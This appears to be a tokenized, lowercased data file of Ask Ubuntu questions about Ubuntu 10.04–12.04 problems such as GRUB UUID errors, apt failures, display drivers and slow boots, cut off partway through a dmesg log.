156063	why ca n't mint boot my cloned ubuntu partition ? ( uuid issue )	i 've been running ubuntu 10.04 and just installed linux mint 13 . i may go with linux mint full-time , but for now i wanted to install it to the first partition , but keep ubuntu bootable . device boot start end blocks id system /dev/sda1 * 2048 58593279 29295616 83 linux /dev/sda2 58595326 976768064 459086369+ 5 extended /dev/sda5 959980140 976768064 8393962+ 82 linux swap / solaris /dev/sda6 58595328 898696186 420050429+ 83 linux /dev/sda7 898697216 959963135 30632960 83 linux sda6 is a data partition with all my documents . sda7 was added new to create the dual boot setup . i cloned sda1 to sda7 with dd if=/dev/sda1 of=/dev/sda7 of course this also cloned the uuid , so i created a new uuid for sda7 with tune2fs /dev/sda7 -u random when i list uuids with blkid it has indeed changed . i then installed linux mint to sda1 . i also have fstab setup to mount sda7 so i can copy configuration files to the new os . i boot into linux mint fine , but when i try to boot into ubuntu , i get a message ( from memory , may be incomplete ) that the loader ca n't find /dev/disk/by-uuid/ < old uuid > . at this point i looked in grub.cfg , and sure enough , the old uuid is listed , along with the new one : # # # begin /etc/grub.d/30_os-prober # # # menuentry `` ubuntu , with linux 2.6.32-41-generic ( on /dev/sda7 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root 3869f8c2-dcf8-4522-bc8b-91b0ce0040fa # this is the new uuid linux /boot/vmlinuz-2.6.32-41-generic root=uuid=72a5e117-9a39-4de1-9d28-53791d055ff5 ro quiet splash # this is the old uuid initrd /boot/initrd.img-2.6.32-41-generic } i then tried to fix this with sudo update-grub , but i still get the same entry with the mix of new and old uuids . i also tried manually editing grub.cfg to replace the old with the new uuid , but i still get the same message , that the loader ca n't find a device with the old uuid . so , where is update-grub reading the old uuid from ? and how do i fix grub so that it can boot the cloned partition ?
156065	ubuntu 12.04 desktop , vnc viewer not refreshing screen	i 've had this issues across multiple machines and multiple versions of ubuntu desktop ( all 10.04 or later ) . usually it happens with an old laptop i 've put ubuntu on but now it 's happening on my primary dev machine ( a quad-core pc recently upgraded to ubuntu 12.04 desktop ) . the problem is this - i can connect to the machine and login with the password , the initial screen looks fine but never refreshes . i can see the monitor for the machine across the room and can see the mouse move and the menus pop up but the image of the screen on the pc in front me running the vnc viewer never updates . so the mouse and keyboard commands are working . ubuntu 12.04 desktop ultra vnc viewer ( also seen with realvnc 's free vnc viewer ) desktop sharing static ip on eth0 ; dynamic id on eth1 i think it is an ubuntu config issue because this pc used to work just fine with 9.04 , 10.04 , and 11.10 ( over the past couple of years ) . i 've also had a couple of laptops that used to have this issue with older ubuntu 's but do n't with 12.04 . additional info : the win7 pc i 'm trying to use to control the ubuntu pc is connected via 2 dlink 8-port gigabit routers . the ubuntu laptop i usually control via vnc is typically only connected to the network via wireless . the screen refresh is choppy but usable . i 've repeated the issue on a win7 laptop which was connected via ethernet and wireless .
156066	can i reinstall my site python distribution ?	i messed up some core packages in my python distribution , probably through some failed easy_install commands . is there any way in ubuntu to blow away the site 's python installation and re-install it to the form defined in the ubuntu package manager ? i am running ubuntu 10.04 .
156071	no wired or wireless networking on new install	this is a new install of ubuntu . i ran 12.04 from a usb drive for a day or so , and had no issues outside of some latency that is more due to the lack of ram on my aspire one d255e than to os . i had wireless running with no issue , and wired tested as working also . i ran the installer and removed windows . now the wireless network is detected but ethernet is not , and neither gets a connection . i disabled proprietary drivers and rebooted , re-enabled the driver , and still neither . i know nothing of ubuntu yet ! what can i do ?
156072	eclipse dissapears when minimized and will not come back ( 12.04 unity )	i have ubuntu 12.04 x64 running unity3d . i downloaded eclipse from eclipse.org ( not the software center ) and created a desktop using gnome-desktop-item-edit . the resulting file is below , and i added it to the launcher on the left of the screen by dragging that file on . # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/home/kevin/eclipse/icon.xpm name [ en_us ] =eclipse exec=/home/kevin/eclipse/eclipse name=eclipse icon=/home/kevin/eclipse/icon.xpm # ! /usr/bin/env xdg-open however , when i minimize eclipse , eclipse disappears . there is no arrow to the left of the icon in the launcher like usual . and when i click on the launcher again , it tries to relaunch eclipse instead of bringing back the one that was minimized . eclipse also does not show up when i alt-tab . i know it is still running because i can see it running with the system monitor . note that eclipse works properly until it is minimized . i have observed this behavior on two different computers now . does anyone know how to fix it ?
156074	i ca n't update my system properly , `` no package header '' error	every time i try to run sudo apt-get update or try running updates from the gui interface i run into the following problem or something similar : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages e : the package lists or status file could not be parsed or opened . i 've tried purging using sudo rm -rf < filename > where < filename > is the listed file above , and then running sudo apt-get update to fix it ( as listed elsewhere in this forum ) and no luck , just keep getting this message . i 'm running ubuntu 12.04 and this is getting really frustrating ... i just want a system that runs smoothly and does n't require it 's hand to be held when it comes to updates . tried the solutions posted below and am still receiving the same errors , sample output : w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_source_sources encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-backports_universe_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_source_sources encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_universe_binary-amd64_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-backports_main_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-backports_multiverse_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-backports_universe_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en % 5fca encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_multiverse_i18n_translation-en % 5fca encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead .
156075	how to reset display settings in xfce \ ubuntu 12.04 and also flgrx drivers	i recently upgraded to ubuntu 12.04 and since i hate unity i installed the xubuntu package and am using xfce instead . since i have a radeon hd5770 i also installed the fglrx drivers . this all went fine ( aside from the fact that the post-release update fglrx drivers have an error on installation and ubuntu thinks they 're not installed when they actually are . i configured my display settings ( dual monitors , a 17 '' crt on vga and a 17 '' lcd on dvi ) in the amdcccle program and everything was perfect . then , 2 days ago , i accidentally clicked on the `` display '' settings in xfce `` settings '' manager . after that , everything got screwed . now , i normally run the crt at 1152x854 and the lcd at 1280x1024 with the crt as my primary monitor ( with panel ) and the lcd without panels etc just to display other windows when i want to drag them over there . the problem is now that if i set my crt to 1152x864 , it stays at 1280x1024 virtually and half the stuff falls off the screen . it also puts the lcd at 1280x1024 but then overlays the crt 's display ontop with different wallpaper in an l shape down the right-hand and bottom edges . in short , nothing makes sense and everything is fubar . i tried uninstalling fglrx through synaptic , and renaming xorg.conf and also the xfce xml file that has monitor settings but it still wo n't make sense . unity on the other hand can currently set everything normally so the problem appears to be only with xfce . in any case , i ca n't even get the fglrx drivers back , when i re-installed them , i ca n't run amdccle anymore as it says the driver is n't installed ! ! can someone help me reset my xfce settings so the monitors are n't screwed with some incorrect virtual desktop size and also so i can get fglrx drivers back and working ? i really do n't want to have to format and reinstall and go through all the hassle but it looks like i may have to : (
156076	how to move clock to the middle of unity panel in ubuntu 12.04	i want to move the clock into the middle of unity panel ( u 12.04 ) to make it looks like in luna os . anyone who can do it , share the way , please ! thanks in advance .
156083	how to add multiple pages which can be switched on press of a button in pygtk using quickly ?	i am building my first app using quickly , pygtk and python . i am confused how to add multiple pages to the same window and how to switch between multiple windows on click of button ? in visual studio it is achieved very easie
156085	why does eclipse keep crashing and dpkg erroring out ?	i am getting the error : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this happened while i was trying to upgrade my pc . i use eclipse and it keeps on crashing . please help . here 's the full text from the terminal , including the error message : sanju @ sanju-dell-system-xps-l502x : ~ $ upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : aisleriot gir1.2-rb-3.0 gir1.2-totem-1.0 gnome-disk-utility gnome-keyring libgck-1-0 libgcr-3-1 libtotem0 linux-generic linux-headers-generic linux-image-generic rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins seahorse totem totem-common totem-mozilla totem-plugins 0 upgraded , 0 newly installed , 0 to remove and 23 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up grub-pc ( 1.99-21ubuntu3.1 ) ... /var/lib/dpkg/info/grub-pc.config : 35 : /etc/default/grub : syntax error : eof in backquote substitution dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : grub-pc e : sub-process /usr/bin/dpkg returned an error code ( 1 )
156088	netbeans does not install properly	i 'm trying to install netbeans ide on my ubuntu 12.04 . however no matter how many time i install/resintall it ( from software center ) , it still gives this strange problem : after i complete the installation and try to launch it , netbeans first displays the initialization window . after it completes , the window disappears and nothing happens . then after a while netbeans seemingly restarts and then again shows the initialization window . this goes on in a never-ending cycle and i 'm ultimately forced to restart my computer and uninstall netbeans . why could this be happening ? i really need netbeans as it is a very good ide .
156091	where is the gnome-shell-extension configuration file ?	i 'm searching the config file that says which extensions are active beacause i want take it in /etc/skel directory . also i 'm searching too the file of theme configuration ( that says which theme is active )
156095	why does openbox on gnome give me an empty desktop ?	i installed new 12.04 and openbox . i logged in with gnome/openbox and now after system starts i see only desktop background image and nothing more . when i right click i can do normal gnome actions like create folder and nothing more really . alt+f2 does n't start run window though i managed to create a folder and then with nautilus start terminal but i really do n't know what to do next . two questions : why does n't openbox start properly ? how in this situation i can get back to gdm login screen and choose other option to log in ?
156103	where can i store other files other than /opt for the application contest ?	i know i have to install it to /opt , but where can i store other files , like pictures which are uploaded by the user or a database file ?
156104	banshee does not start ( ubuntu 12.04 )	i have installed banshee , but during the installation something went wrong and now i am experiencing this : balg @ scorpion : ~ $ banshee unhandled exception : system.typeloadexception : could not load type 'banshee.servicestack.dbusservicemanager ' from assembly 'banshee.services , version=2.4.0.0 , culture=neutral , publickeytoken=null ' . [ error ] fatal unhandled exception : system.typeloadexception : could not load type 'banshee.servicestack.dbusservicemanager ' from assembly 'banshee.services , version=2.4.0.0 , culture=neutral , publickeytoken=null ' . i have tried to remove and purge banshee , delete the config files and then reinstall it , but it did n't help . can anyone help me ? thanks , balg
156105	no boot device has been detectede after minor update in 12.04	june 24 , 2012 . minor update . as far as i remember about 20 objects , at least some related to virtual box . reboot next day gives message : no boot device has been detected , please press any key to reboot ! well , ... that 'anykey ' wo n't work . no dualboot . just have ubuntu 12.04 , 64bits version . what can i do ?
156110	how do i `` log '' the m most recent images from a webcam using the command-line ?	i want to take a picture with the webcam every n time units and store it to /tmp/somefolder/ for further use with other tools and only keep the last m images . how to do this using webcam ( unix command ) ? any help appreciated .
156111	question about graphics card driver installation	i 'm really new to ubuntu and really liking the help given on this site , i used quite a bit so far but i 'm really confused as to how i should install graphics card drivers for my machine . first off , i have an acer 3830tg , and the graphics card on it is nvidia gt 540m . if anyone can please point me in the right direction it would be greatly appreciated . : ) i 'm running 12.04 .
156113	why does 12.04 upgrade abort with out of space error when i have lots of it ?	when upgrading ubuntu from 11.10 to 12.04 i discovered an unexpected problem . the upgrade was stopped because there was n't enough free space for the installation . i managed to free some space and do the upgrade but now a prompt appears after logging in saying i 'm out of space . this prompt asks me if i want to examine the problem . the `` disk usage analyser '' is opened . in the top it says : total filesystem capacity : 47.0 gb ( used : 13.5 gb available : 33.4 gb ) folder -- usage -- size / -- 100 % -- 12.5 gb usr -- 44.8 % -- 5.6 gb home -- 30.3 % -- 3.8 gb lib -- 13.0 % -- 1.6 gb var -- 9.1 % -- 1.1 gb boot 2.5 % 309.5 gb and a lot of small contributors like : etc , opt , sbin , bin etc . i do not really understand this problem since the analyser in the top says that i have 33.4 gb left in this file system . what can i do to make ubuntu use the remaining space ? running df -i in the terminal gives : filesystem inodes iused ifree iuse % mounted on /dev/sda7 610800 576874 33926 95 % / udev 213451 563 212888 1 % /dev tmpfs 218524 486 218038 1 % /run none 218524 3 218521 1 % /run/lock none 218524 7 218517 1 % /run/shm /dev/sda8 2264752 16371 2248381 1 % /home the output of df -h filesystem size used avail use % mounted on /dev/sda7 9,3g 7,8g 1,1g 88 % / udev 993m 4,0k 993m 1 % /dev tmpfs 401m 884k 400m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1003m 152k 1002m 1 % /run/shm /dev/sda8 35g 4,0g 29g 13 % /home /dev/sda2 101g 64g 37g 64 % /media/a2c8e28bc8e25cd3 running sudo fdisk -l gives disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000080 device boot start end blocks id system /dev/sda1 63 96389 48163+ de dell utility /dev/sda2 * 98304 210434488 105168092+ 7 hpfs/ntfs/exfat /dev/sda3 210436094 312576704 51070305+ f w95 ext 'd ( lba ) /dev/sda5 306279288 312576704 3148708+ dd unknown /dev/sda6 210436096 214341631 1952768 82 linux swap / solaris /dev/sda7 214343680 233873407 9764864 83 linux /dev/sda8 233875456 306278399 36201472 83 linux partition table entries are not in disk order
156114	can i stop battery charging at say 80 % and switch to ac ?	while i was looking for a battery management utility for my dell e5420 , i came to read this post - how can i limit battery charging to 80 % capacity ? . sofar , i have n't found one that relates to my laptop . so , i wonder now if any battery manager utility can be found for my laptop specified above . i would be happy if someone could point me if such utility is available under ubuntu 12.04 that can stop charging a battery at a certain percentage and to only use a/c mode . again , to start using battery mode when the a/c is off or when the battery level reaches at certain level . thanks for all your help . elim .
156115	repair damaged hard drives with ubuntu ?	i have two damaged hard drives one external , and i 'm running my ubuntu 12.04 lts on the other ! so the problem is that i could n't repair it , i tried gparted , mkfs and nothing helps . i saw a question similar to this here , but the response is n't what i 'm looking for ! because in windows the command chkdsk does n't work for me !
156116	android phone : how do i play mp3s on my hard drive over wifi ?	was n't sure whether to ask on here on on android.stackexchange.com ... but i want to play music which is on my desktop machine through my phone . the music is coming from ext4 partition which i am happy to share on the lan . it should use wifi not bluetooth ( because i hope to use the bluetooth interface for other things , simultaneously ) . is it possible and what do i need to setup on the desktop ( on ubuntu 12.04 ) and/or my phone ( galaxy nexus ) ? edit : just to clarify , i want the music to be playing from the phone , not through the desktop 's speakers .
156129	how do i install the j2ee sdk on 10.04 ?	i get the following error when i try to install j2eesdk on ubuntu 10.04 ./j2eesdk-1_4_03-linux-ml.bin : error while loading shared libraries : libstdc++-libc6.2-2.so.3 : can not open shared object file : no such file or directory i have searched google , and all sites provide fixes that dont work sudo apt-get install libstdc++-libc6.2-2.so.3 any ideas ?
156133	problems ( re ) installing ubuntu one 3.0.2 on windows xp ?	i had previously installed an ubuntu one client as a test on a windows xp machine . now i wanted to change the account for the client to a production one but had problems changing the email address so decided to do a reinstall . ran uninstall . downloaded ubuntuone-3.0.2-windows-installer.exe . it downloads , goes through the unpacking/install â strangely some of the messages say updating as if it was replacing something that was already there . i do not get the setup/signin screen . there is no ubuntu % processes running . the program files/ubuntuone directory exists with data and dist folders . the u icon is on the desktop â pointing at ubuntuone/dist/ubuntuone-control-panel-qt.exe but this does not run . ran uninstall again , deleted program files/ubuntuone directory , removed any ubuntu entries for registry , remove all 'application data ' ubuntu files and directories , rebooted . downloaded install again - exactly the same as above . from the deleted registry entries the previous successful install was 2.0.3 , i therefore re-installed 2.0.3 and everything is working again . not sure if this is a problem with this computer or a more general problem with 3.0.2 and xp ?
156135	is this ubuntu one dbus signal connection code correct ?	this is my first time using dbus so i 'm not entirely sure if i 'm going about this the right way . i 'm attempting to connect the the ubuntu one dbus service and obtain login credentials for my app , however the slots i 've connected to the dbus return signals detailed here never seem to be firing , despite a positive result being returned during the connection . before i start looking for errors in the details relating to this specific service , could someone please tell me if this code would even work in the first place , or if i 'm done something wrong here ? int main ( ) { ubuntuonedbus *u1dbus = new ubuntuonedbus ; u1dbus- > init ( ) } class ubuntuonedbus : public qobject { q_object qstring busname ; qstring path ; qstring interface ; qstring method ; qstring signature ; void connectreturnsignals ( ) ; private slots : void credentialsfound ( ) ; void credentialsnotfound ( ) ; void credentialserror ( ) ; public : ubuntuonedbus ( ) ; void init ( ) ; } ; ubuntuonedbus : :ubuntuonedbus ( ) { busname = `` com.ubuntuone.credentials '' ; path = `` /credentials '' ; interface = `` com.ubuntuone.credentialsmanagement '' ; method = `` register '' ; signature = `` a { ss } '' ; connectreturnsignals ( ) ; } void ubuntuonedbus : :init ( ) { qdbusmessage message = qdbusmessage : :createmethodcall ( busname , path , interface , method ) ; qdbusconnection : :sessionbus ( ) .send ( message ) ; } void ubuntuonedbus : :connectreturnsignals ( ) { qdbusconnection : :sessionbus ( ) .connect ( busname , path , interface , `` credentialsfound '' , this , slot ( credentialsfound ( ) ) ) ; qdbusconnection : :sessionbus ( ) .connect ( busname , path , interface , `` credentialsnotfound '' , this , slot ( credentialsnotfound ( ) ) ) ; qdbusconnection : :sessionbus ( ) .connect ( busname , path , interface , `` credentialserror '' , this , slot ( credentialserror ( ) ) ) ; } void ubuntuonedbus : :credentialsfound ( ) { qdebug ( ) < < `` credentials found '' ; } void ubuntuonedbus : :credentialsnotfound ( ) { std : :cout < < `` credentials not found '' < < std : :endl ; } void ubuntuonedbus : :credentialserror ( ) { std : :cout < < `` credentials error '' < < std : :endl ; }
156137	can ubuntu use a flash drive to increase performance like readyboost ?	this might be a silly question but is there any way to use a flash drive to optimize the memory on lubuntu 12.04 ? kinda like how you can in win7 ?
156141	how can i set beatbox as default music player ?	i have installed beatbox but i ca n't set it as default music player in system configuration of gnome-shell . how can i set it manually ? i add information : beatbox ca n't be actually define like default audio player in gnome : https : //bugs.launchpad.net/beat-box/+bug/972956 i want to know how can i define manually the default audio player in the same manner that i can define the default calendar app : how to change gnome shell calendar default application ?
156144	why ca n't i remove language variants like english ( nz ) , etc . ?	i 'd like to remove some unwanted languages from my system . i only use italian , and english uk and us . in `` systems settings '' i can find a lot of languages that i do n't even know why they have been installed . however , although i am an administrator , i ca n't remove the unwanted languages ( as you can see the `` - '' is greyed out ) . i have tried running `` sudo gnome-control-center '' but there the only language displayed is english . thanks a lot in advance for the help ! luca
156148	how can i install libreoffice base ?	useful info : i have tried running sudo dpkg -- configure -a and sudo apt-get install -f with no result . i am running kubuntu 11.10 ( the updater is far too unreliable to ever be trusted with performing a version upgrade ) the rest of libreoffice seems to work fine ( apart from an annoying bug where tooltips are shown as black text on black background ... ) i have need to use libreoffice base to complete a mail merge document . however , i noticed it 's not installed . when i go to install it however ... rob @ hydrogen : ~ $ sudo apt-get install libreoffice-base [ sudo ] password for rob : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libreoffice-base : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but it is not going to be installed depends : libreoffice-base-core ( = 1:3.4.4-0ubuntu1 ) but it is not going to be installed depends : libreoffice-java-common ( > = 1:3.4.4~ ) but it is not going to be installed suggests : libmyodbc but it is not going to be installed or odbc-postgresql but it is not going to be installed or libsqliteodbc but it is not going to be installed or tdsodbc but it is not going to be installed or mdbtools but it is not going to be installed suggests : libreoffice-gcj but it is not installable suggests : libreoffice-report-builder but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm bemused as to which packages it seems to think i have held . as far as i 'm aware , kubuntu does n't give you the option to hold packages ... so , how do i get out of this dependency hell ?
156149	are these dmesg gaps causing my 12.04 to boot up slowly ?	i am having a really slow boot on ubuntu 12.04 . below is my dmesg log 's major gaps : [ 3.704928 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 26.933486 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 26.963373 ] udevd [ 521 ] : starting version 175 ... ... . [ 30.610196 ] console : switching to colour frame buffer device 128x48 [ 30.610219 ] fb0 : vesa vga frame buffer device [ 55.783563 ] ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro [ 55.896936 ] init : failsafe main process ( 862 ) killed by term signal ... ... . [ 57.789828 ] [ fglrx ] reserved fb block : unshared offset : fc21000 , size:3df000 [ 57.789831 ] [ fglrx ] reserved fb block : unshared offset:1fffb000 , size:5000 [ 62.734097 ] retire_capture_urb : 33 callbacks suppressed and the entire log starting from the fist major jump : [ 2.321228 ] usbhid : usb hid core driver [ 3.704928 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 26.933486 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 26.963373 ] udevd [ 521 ] : starting version 175 [ 26.997901 ] lp : driver loaded but no devices found [ 27.108201 ] adding 4189180k swap on /dev/sda7 . priority : -1 extents:1 across:4189180k [ 27.179344 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 27.179349 ] disabling lock debugging due to kernel taint [ 27.223563 ] lib80211 : common routines for ieee802.11 drivers [ 27.223567 ] lib80211_crypt : registered algorithm 'null' [ 27.230060 ] wmi : mapper loaded [ 27.282402 ] [ fglrx ] maximum main memory to use for locked dma buffers : 3789 mbytes . [ 27.282841 ] [ fglrx ] vendor : 1002 device : 9552 count : 1 [ 27.288436 ] [ fglrx ] ioport : bar 1 , base 0xde00 , size : 0x100 [ 27.288455 ] pci 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 27.288462 ] pci 0000:01:00.0 : setting latency timer to 64 [ 27.288748 ] [ fglrx ] kernel pat support is enabled [ 27.288774 ] [ fglrx ] module loaded - fglrx 8.96.4 [ mar 12 2012 ] with 1 minors [ 27.317960 ] type=1400 audit ( 1340701603.968:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=592 comm= '' apparmor_parser '' [ 27.318412 ] type=1400 audit ( 1340701603.968:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=592 comm= '' apparmor_parser '' [ 27.318667 ] type=1400 audit ( 1340701603.968:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=592 comm= '' apparmor_parser '' [ 27.320618 ] wl 0000:0c:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 27.320633 ] wl 0000:0c:00.0 : setting latency timer to 64 [ 27.345899 ] lib80211_crypt : registered algorithm 'tkip' [ 27.671729 ] eth1 : broadcom bcm4315 802.11 hybrid wireless controller 5.100.82.38 [ 27.679365 ] acpi device:36 : registered as cooling_device2 [ 27.679963 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a03:00/device:34/lnxvideo:00/input/input6 [ 27.680139 ] acpi : video device [ vid ] ( multi-head : yes rom : no post : no ) [ 27.680197 ] [ firmware bug ] : duplicate acpi video bus devices for the same vga controller , please try module parameter `` video.allow_duplicates=1 '' if the current driver does n't work . [ 27.689258 ] dcdbas dcdbas : dell systems management base driver ( version 5.6.0-3.2 ) [ 27.909956 ] input : dell wmi hotkeys as /devices/virtual/input/input7 [ 27.920377 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 27.920457 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 27.920493 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 27.925526 ] udevd [ 535 ] : renamed network interface eth1 to wlan0 [ 27.926453 ] linux video capture interface : v2.00 [ 27.935642 ] uvcvideo : found uvc 1.00 device ( 046d:0990 ) [ 27.965100 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 27.965208 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 27.968986 ] input : uvc camera ( 046d:0990 ) as /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0/input/input10 [ 27.969151 ] usbcore : registered new interface driver uvcvideo [ 27.969154 ] usb video class driver ( 1.1.1 ) [ 28.115197 ] usbcore : registered new interface driver snd-usb-audio [ 28.524059 ] input : ps/2 mouse as /devices/platform/i8042/serio2/input/input11 [ 28.550620 ] input : alpsps/2 alps glidepoint as /devices/platform/i8042/serio2/input/input12 [ 30.608553 ] vesafb : mode is 1024x768x32 , linelength=4096 , pages=0 [ 30.608556 ] vesafb : scrolling : redraw [ 30.608559 ] vesafb : truecolor : size=0:8:8:8 , shift=0:16:8:0 [ 30.608567 ] mtrr : type mismatch for e0000000,400000 old : write-back new : write-combining [ 30.608571 ] mtrr : type mismatch for e0000000,200000 old : write-back new : write-combining [ 30.608574 ] mtrr : type mismatch for e0000000,100000 old : write-back new : write-combining [ 30.608578 ] mtrr : type mismatch for e0000000,80000 old : write-back new : write-combining [ 30.608581 ] mtrr : type mismatch for e0000000,40000 old : write-back new : write-combining [ 30.608585 ] mtrr : type mismatch for e0000000,20000 old : write-back new : write-combining [ 30.608588 ] mtrr : type mismatch for e0000000,10000 old : write-back new : write-combining [ 30.608591 ] mtrr : type mismatch for e0000000,8000 old : write-back new : write-combining [ 30.608595 ] mtrr : type mismatch for e0000000,4000 old : write-back new : write-combining [ 30.608598 ] mtrr : type mismatch for e0000000,2000 old : write-back new : write-combining [ 30.608601 ] mtrr : type mismatch for e0000000,1000 old : write-back new : write-combining [ 30.609975 ] vesafb : framebuffer at 0xe0000000 , mapped to 0xffffc90005200000 , using 3072k , total 3072k [ 30.610196 ] console : switching to colour frame buffer device 128x48 [ 30.610219 ] fb0 : vesa vga frame buffer device [ 55.783563 ] ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro [ 55.896936 ] init : failsafe main process ( 862 ) killed by term signal [ 55.970556 ] ppdev : user-space parallel port driver [ 56.037984 ] bluetooth : core ver 2.16 [ 56.038033 ] net : registered protocol family 31 [ 56.038035 ] bluetooth : hci device and connection manager initialized [ 56.038039 ] bluetooth : hci socket layer initialized [ 56.038041 ] bluetooth : l2cap socket layer initialized [ 56.038971 ] bluetooth : sco socket layer initialized [ 56.039213 ] type=1400 audit ( 1340701632.688:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=943 comm= '' apparmor_parser '' [ 56.040322 ] type=1400 audit ( 1340701632.692:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=943 comm= '' apparmor_parser '' [ 56.075476 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 56.075479 ] bluetooth : bnep filters : protocol multicast [ 56.093563 ] type=1400 audit ( 1340701632.744:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=976 comm= '' apparmor_parser '' [ 